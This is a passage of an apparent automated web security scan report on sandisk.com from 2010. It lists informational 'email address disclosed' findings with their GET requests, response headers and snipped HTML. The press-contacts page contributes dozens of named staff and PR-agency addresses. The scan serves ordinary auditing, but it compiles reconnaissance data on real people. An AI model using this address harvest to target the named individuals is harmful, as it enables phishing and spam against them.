Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 42996
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:13 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.52. http://www.sandisk.com/about-sandisk/media-kit/retail-product-photos/dslr/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/media-kit/retail-product-photos/dslr/

Issue detail

The following email address was disclosed in the response:

Request

GET /about-sandisk/media-kit/retail-product-photos/dslr/ HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 23167
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:14 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.53. http://www.sandisk.com/about-sandisk/media-kit/retail-product-photos/dslr/sandisk-extreme-pro-compactflash-card.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/media-kit/retail-product-photos/dslr/sandisk-extreme-pro-compactflash-card.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /about-sandisk/media-kit/retail-product-photos/dslr/sandisk-extreme-pro-compactflash-card.aspx HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/press-room
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 17531
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:14 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.54. http://www.sandisk.com/about-sandisk/media-kit/retail-products-brochures  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/media-kit/retail-products-brochures

Issue detail

The following email address was disclosed in the response:

Request

GET /about-sandisk/media-kit/retail-products-brochures HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/media-kit
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 53527
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:08 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.55. http://www.sandisk.com/about-sandisk/media-kit/trademark-information  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/media-kit/trademark-information

Issue detail

The following email address was disclosed in the response:

Request

GET /about-sandisk/media-kit/trademark-information HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/media-kit
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21811
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:07 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.56. http://www.sandisk.com/about-sandisk/press-room  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/press-room

Issue detail

The following email address was disclosed in the response:

Request

GET /about-sandisk/press-room HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 43181
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:40:48 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.57. http://www.sandisk.com/about-sandisk/press-room/press-contacts  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/press-room/press-contacts

Issue detail

The following email addresses were disclosed in the response:

Request

GET /about-sandisk/press-room/press-contacts HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/press-room
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 32351
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:40:58 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sandiskPR@sandisk.com">sandiskPR@sandisk.com</a>
...[SNIP]...
<a
href="mailto:ryan.donovan@sandisk.com">ryan.donovan@sandisk.com</a>
...[SNIP]...
<a
href="mailto:mike.wong@sandisk.com">mike.wong@sandisk.com</a>
...[SNIP]...
<a
href="mailto:wendy.sept@sandisk.com">wendy.sept@sandisk.com</a>
...[SNIP]...
<a
href="mailto:SanDiskRetail@hillandknowlton.com">SanDiskRetail@hillandknowlton.com</a>
...[SNIP]...
<a
href="mailto:sandiskmedia@hillandknowlton.com">sandiskmedia@hillandknowlton.com</a>
...[SNIP]...
<a href="mailto:sandisk@lymanpr.com">sandisk@lymanpr.com</a>
...[SNIP]...
<a href="mailto:sandiskmedia@hillandknowlton.com" mce_href="mailto:sandiskmedia@hillandknowlton.com"><span>sandiskmedia@hillandknowlton.com</span>
...[SNIP]...
<a href="mailto:sandisk@cohnwolfe.com" mce_href="mailto:sandisk@cohnwolfe.com">sandisk@cohnwolfe.com</a>
...[SNIP]...
<a href="mailto:sandisk@lymanpr.com" mce_href="mailto:sandisk@lymanpr.com">sandisk@lymanpr.com</a>
...[SNIP]...
<a
href="mailto:Stephen.Duignan@sandisk.com">stephen.duignan@sandisk.com</a>
...[SNIP]...
<a
href="mailto:SanDisk@text100.de%20%20%20">SanDisk@text100.de</a>
...[SNIP]...
<a
href="mailto:cecile.missildine@text100.fr">cecile.missildine@text100.fr</a>
...[SNIP]...
<a
href="mailto:Mie.feifer@text100.com">Mie.feifer@text100.com</a>
...[SNIP]...
<a href="mailto:sd@mmd.ru">sd@mmd.ru</a>
...[SNIP]...
<a href="mailto:sandisk@mmd.com.ua">sandisk@mmd.com.ua</a>
...[SNIP]...
<a
href="mailto:cesar.pastrana@text100.es">cesar.pastrana@text100.es</a>
...[SNIP]...
<a
href="mailto:barbara.ghirimoldi@text100.it">barbara.ghirimoldi@text100.it</a>
...[SNIP]...
<a href="mailto:hanne@text100.com">hanne@text100.com</a>
...[SNIP]...
<a
href="mailto:anders.hall@text100.se">anders.hall@text100.se</a>
...[SNIP]...
<a
href="mailto:alison.oleary@text100.co.uk">alison.oleary@text100.co.uk</a>
...[SNIP]...
<a
href="mailto:vicki.realff@text100.co.uk">vicki.realff@text100.co.uk</a>
...[SNIP]...
<a
href="mailto:maggie.trott@text100.co.uk">maggie.trott@text100.co.uk</a>
...[SNIP]...
<a
href="mailto:jolanta.slowinska@mmdcee.com">jolanta.slowinska@mmdcee.com</a>
...[SNIP]...
<a
href="mailto:amsterdamsandisk@text100.nl">amsterdamsandisk@text100.nl</a>
...[SNIP]...
<a
href="mailto:sandisk@tcf-me.com%20">
...[SNIP]...
<a
href="mailto:nahumdon@netvision.net.il">nahumdon@netvision.net.il</a>
...[SNIP]...
<a href="mailto:jojo@apexpr.com.tw">jojo@apexpr.com.tw</a>
...[SNIP]...
<a href="mailto:ben@sunnypr.co.kr">ben@sunnypr.co.kr</a>
...[SNIP]...
<a
href="mailto:pauline.poon@text100.com.hk">pauline.poon@text100.com.hk</a>
...[SNIP]...
<a
href="mailto:Wayne.shi@text100.com.cn">Wayne.shi@text100.com.cn</a>
...[SNIP]...
<a
href="mailto:marc.certenais@text100.com.sg">marc.certenais@text100.com.sg</a>
...[SNIP]...
<a
href="mailto:ruvinau@text100.co.in">ruvinau@text100.co.in</a>
...[SNIP]...
<a
href="mailto:mariko.yokoyama@Text100.co.jp">mariko.yokoyama@Text100.co.jp</a>
...[SNIP]...
<a
href="mailto:ymachado@imsmarketing.com">ymachado@imsmarketing.com</a>
...[SNIP]...
<a
href="mailto:lhuerta@imsmarketing.com">lhuerta@imsmarketing.com</a>
...[SNIP]...
<a
href="mailto:mfigueras@imsmarketing.com">mfigueras@imsmarketing.com</a>
...[SNIP]...
<a
href="mailto:arocheray@imsmarketing.com">arocheray@imsmarketing.com<br />
...[SNIP]...
<a
href="mailto:csquinca@imsmarketing.com">csquinca@imsmarketing.com</a>
...[SNIP]...
<a
href="mailto:aalcaino@imsmarketing.com">aalcaino@imsmarketing.com</a>
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.58. http://www.sandisk.com/about-sandisk/press-room/press-releases  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/press-room/press-releases

Issue detail

The following email address was disclosed in the response:

Request

GET /about-sandisk/press-room/press-releases HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 49376
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:04 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.59. http://www.sandisk.com/about-sandisk/press-room/press-releases/2009/2009-09-14-sandisk-extreme-pro-compactflash-memory-card-raises-bar-for-professional-grade-performance,-capacity-and-reliability  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/press-room/press-releases/2009/2009-09-14-sandisk-extreme-pro-compactflash-memory-card-raises-bar-for-professional-grade-performance,-capacity-and-reliability

Issue detail

The following email addresses were disclosed in the response:

Request

GET /about-sandisk/press-room/press-releases/2009/2009-09-14-sandisk-extreme-pro-compactflash-memory-card-raises-bar-for-professional-grade-performance,-capacity-and-reliability HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/press-room
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 24124
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:40:56 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:wendy.sept@sandisk.com">wendy.sept@sandisk.com</a></td>
<td><a
href="mailto:sandisk@cohnwolfe.com">sandisk@cohnwolfe.com</a>
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.60. http://www.sandisk.com/about-sandisk/press-room/press-releases/2010/2010-10-08-sandisk-schedules-third-quarter-2010-conference-call  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/press-room/press-releases/2010/2010-10-08-sandisk-schedules-third-quarter-2010-conference-call

Issue detail

The following email addresses were disclosed in the response:

Request

GET /about-sandisk/press-room/press-releases/2010/2010-10-08-sandisk-schedules-third-quarter-2010-conference-call HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/press-room
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 14419
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:40:53 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a href="mailto:IR@SanDisk.com">IR@SanDisk.com</a>
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.61. http://www.sandisk.com/about-sandisk/press-room/press-releases/2010/2010-10-21-sandisk-announces-third-quarter-2010-financial-results  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/press-room/press-releases/2010/2010-10-21-sandisk-announces-third-quarter-2010-financial-results

Issue detail

The following email address was disclosed in the response:

Request

GET /about-sandisk/press-room/press-releases/2010/2010-10-21-sandisk-announces-third-quarter-2010-financial-results HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 24491
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:40:53 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.62. http://www.sandisk.com/about-sandisk/press-room/press-releases/2010/2010-11-04-sandisk-to-celebrate-15-years-on-the-nasdaq-with--opening-bell-ceremony  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/press-room/press-releases/2010/2010-11-04-sandisk-to-celebrate-15-years-on-the-nasdaq-with--opening-bell-ceremony

Issue detail

The following email addresses were disclosed in the response:

Request

GET /about-sandisk/press-room/press-releases/2010/2010-11-04-sandisk-to-celebrate-15-years-on-the-nasdaq-with--opening-bell-ceremony HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 18412
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:40:53 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:ryan.donovan@sandisk.com">ryan.donovan@sandisk.com</a>
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.63. http://www.sandisk.com/about-sandisk/press-room/press-releases/2010/2010-11-09-sandisk-wins-ces-innovations-2011-design-and-engineering-award-for-worldâ??s-smallest-64gb-solid-state-drive  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/press-room/press-releases/2010/2010-11-09-sandisk-wins-ces-innovations-2011-design-and-engineering-award-for-world........s-smallest-64gb-solid-state-drive

Issue detail

The following email address was disclosed in the response:

Request

GET /about-sandisk/press-room/press-releases/2010/2010-11-09-sandisk-wins-ces-innovations-2011-design-and-engineering-award-for-world........s-smallest-64gb-solid-state-drive HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 16 Nov 2010 23:40:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12745


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.64. http://www.sandisk.com/about-sandisk/press-room/press-releases/2010/2010-11-09-sandisk-wins-ces-innovations-2011-design-and-engineering-award-for-worldã¢â??¬â??¢s-smallest-64gb-solid-state-drive  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/press-room/press-releases/2010/2010-11-09-sandisk-wins-ces-innovations-2011-design-and-engineering-award-for-world..................s-smallest-64gb-solid-state-drive

Issue detail

The following email address was disclosed in the response:

Request

GET /about-sandisk/press-room/press-releases/2010/2010-11-09-sandisk-wins-ces-innovations-2011-design-and-engineering-award-for-world..................s-smallest-64gb-solid-state-drive HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 16 Nov 2010 23:41:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12765


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.65. http://www.sandisk.com/about-sandisk/press-room/press-releases/2010/2010-11-09-sandisk-wins-ces-innovations-2011-design-and-engineering-award-for-worldã£â¢ã¢â?šâ¬ã¢â?žâ¢s-smallest-64gb-solid-state-drive  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/press-room/press-releases/2010/2010-11-09-sandisk-wins-ces-innovations-2011-design-and-engineering-award-for-world......................................s-smallest-64gb-solid-state-drive

Issue detail

The following email address was disclosed in the response:

Request

GET /about-sandisk/press-room/press-releases/2010/2010-11-09-sandisk-wins-ces-innovations-2011-design-and-engineering-award-for-world......................................s-smallest-64gb-solid-state-drive HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 16 Nov 2010 23:42:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12805


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.66. http://www.sandisk.com/about-sandisk/privacy-policy  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/privacy-policy

Issue detail

The following email addresses were disclosed in the response:

Request

GET /about-sandisk/privacy-policy HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 39795
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:40:58 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:privacy@sandisk.com">
...[SNIP]...
<a
href="mailto:privacy@sandisk.com">privacy@sandisk.com</a>
...[SNIP]...
<a
href="mailto:privacy-la@sandisk.com">privacy-la@sandisk.com</a>
...[SNIP]...
<a
href="mailto:privacy-EMEA@sandisk.com">privacy-EMEA@sandisk.com</a>
...[SNIP]...
<a
href="mailto:privacy-japan@sandisk.com">privacy-japan@sandisk.com</a>
...[SNIP]...
<a
href="mailto:privacy-korea@sandisk.com">privacy-korea@sandisk.com</a>
...[SNIP]...
<a
href="mailto:privacy-asia@sandisk.com">privacy-asia@sandisk.com</a>
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.67. http://www.sandisk.com/about-sandisk/privacy-policy/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/privacy-policy/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /about-sandisk/privacy-policy/ HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 39796
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:28 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:privacy@sandisk.com">
...[SNIP]...
<a
href="mailto:privacy@sandisk.com">privacy@sandisk.com</a>
...[SNIP]...
<a
href="mailto:privacy-la@sandisk.com">privacy-la@sandisk.com</a>
...[SNIP]...
<a
href="mailto:privacy-EMEA@sandisk.com">privacy-EMEA@sandisk.com</a>
...[SNIP]...
<a
href="mailto:privacy-japan@sandisk.com">privacy-japan@sandisk.com</a>
...[SNIP]...
<a
href="mailto:privacy-korea@sandisk.com">privacy-korea@sandisk.com</a>
...[SNIP]...
<a
href="mailto:privacy-asia@sandisk.com">privacy-asia@sandisk.com</a>
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.68. http://www.sandisk.com/about-sandisk/privacy-policy/archived-privacypolicy  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/privacy-policy/archived-privacypolicy

Issue detail

The following email addresses were disclosed in the response:

Request

GET /about-sandisk/privacy-policy/archived-privacypolicy HTTP/1.1
